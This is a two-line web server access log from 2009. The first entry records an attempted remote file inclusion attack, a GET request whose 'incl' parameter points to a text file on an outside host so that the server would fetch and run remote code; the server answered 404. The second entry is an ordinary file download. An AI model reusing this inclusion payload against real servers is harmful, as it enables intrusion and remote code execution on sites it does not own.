200.103.16.12 - - [26/Jul/2009:11:23:20 -0700] "GET /logs/access_080516.log%20%20/index.php?incl=http://rotelle.altervista.org/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [26/Jul/2009:11:23:20 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
